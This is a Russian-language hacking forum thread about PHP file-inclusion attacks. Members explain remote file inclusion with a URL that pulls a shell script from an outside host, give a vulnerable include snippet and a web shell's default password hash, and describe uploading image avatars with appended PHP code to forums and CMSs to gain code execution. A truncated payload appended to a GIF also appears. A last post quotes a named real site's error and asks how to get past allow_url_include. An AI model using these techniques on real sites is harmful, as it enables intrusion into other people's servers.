Авторские статьи php injection

Discussion in 'Статьи' started by GreenBear, 24 Dec 2005.

  1. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    да
     
  2. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    а там пароль по умолчанию не знаю :(( только есть хэш: 63a9f0ea7bb98050796b649e85481845

    а зачем папка WSOmanager ? там что ?
    кстати, а как тогда направить инклюд, если этот шелл требует авторизацию?
    темно как то мне ....
     
  3. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    root пароль, там комент должен быть:
    63a9f0ea7bb98050796b649e85481845 // root
    как то так, не помню точно.
    И хватит оффтопить в теме.
     
  4. B0o0M

    B0o0M Member

    Joined:
    3 Aug 2009
    Messages:
    102
    Likes Received:
    8
    Reputations:
    1
    index.php?page=http://nabstre.tu2.ru/shell.txt? вот почему в конце ? никак не пойму,
    если можно то плиссс с примером исходного кода
     
  5. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93

    http://forum.antichat.ru/thread23501.html

    см Примечания к перовму разделу
     
  6. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    Бум, елементарный пример:

    PHP:
    <?
    $re $_GET['re'];
    include(
    $re.".php");
    ?>
     
  7. Static

    Static New Member

    Joined:
    17 Jul 2010
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    прочел на форуме одном
    можете подробней описать сей процесс ? ни как дойти не может
     
  8. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Смотри... У тебя есть локальный инклуд. Твоя задача - подставить туда такой файл, чтобы выполнялся твой код. Ищешь какие-нибудь форумы, cms'ки и т.д. Регаешься там. И заливаешь туда картинку как аватарку. Но до этого в конец этой картинки вставляешь свой код. Таким образом, проинклудив эту аватарку, у тебя есть выполняется твой evil-code.
     
    2 people like this.
  9. Static

    Static New Member

    Joined:
    17 Jul 2010
    Messages:
    20
    Likes Received:
    0
    Reputations:
    0
    Вот так я вижу gif-ку с блокнота.
    Code:
    <ЖЖєвЬЖ}}|РРаъмМЧШзггУлУЁіі©С鶶ёш}}~ййъґґОЕЕФОФ¬§а`Лж®че·~
    ~Зє¤жжЪЉЉ…|}~ФжєЕЅж||}ЫзЖоНћМХйДШЕzyuЄЄљэхЩєИ*
    [[UнцдииЫєЅмЦлє{|}гиИz{|}}}Жб¬~цовКеІЛеіАОХjjeјЕеЩЪщ}
    ~ћћЖТЬЏЖЭ»KKF{{|<<6¬¬зън
    №ЩтКќћ§дтЧ…€ѓzz{–˜ЋКПСТвЄ{}~z|}}~}Љ‡|ЅЙЪ~~}~~°±
    ІІІІ|}}yyzјДКЬжЫйЭОЬюЬЄз*yz{ЅАцz{z{|
    {лфйxyzґґі¶¶юхТўддгюоіююэЛи®ааО
    В конце всего мне надо сделать так:
    Code:
    .......<ЖЖєвЬЖ}}|РРаъмМЧШзггУлУЁіі©С鶶ёш}}~ййъґґОЕЕФОФ¬§а`Лж®че·~
    ~Зє¤жжЪЉЉ…|}~ФжєЕЅж||}ЫзЖоНћМХйДШЕzyuЄЄљэхЩєИ*
    [[UнцдииЫєЅмЦлє{|}гиИz{|}}}Жб¬~цовКеІЛеіАОХjjeјЕеЩЪщ}
    ~ћћЖТЬЏЖЭ»KKF{{|<<6¬¬зън
    №ЩтКќћ§дтЧ…€ѓzz{–˜ЋКПСТвЄ{}~z|}}~}Љ‡|ЅЙЪ~~}~~°±
    ІІІІ|}}yyzјДКЬжЫйЭОЬюЬЄз*yz{ЅАцz{z{|
    {лфйxyzґґі¶¶юхТўддгюоіююэЛи®ааО
    
    <?php
    ........................................
    ='\x29\x29\x29\x3B",".");?>
    ??

    Принцип работы уязвимости понял. С картинкой вопрос только. Че да как редактировать.
     
  10. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    а что не ясного то?
    открыл блокнотом, запихнул, сохранил.
     
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Не пойдёт блокнотом. Он портит бинарные файлы.
    Используй любой хекс-редактор.
     
  12. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    и к чему сей час волноваться за сохранность картинки?
    его, как мне показалось, интересовала техническая сторона.
     
  13. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Большинство движков испорченный файл картинки не примут.
     
  14. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    спасибо, я знаю. но речь о другом. не стоит грузить человека этим сей час.
     
  15. MaxCPP

    MaxCPP New Member

    Joined:
    12 Oct 2012
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Warning: require(): http:// wrapper is disabled in the server configuration by allow_url_include=0 in /web/htdocs/www.otcdoors.com/home/index.php on line 344
    с этим как быть? админ выключил возможность инклуда с http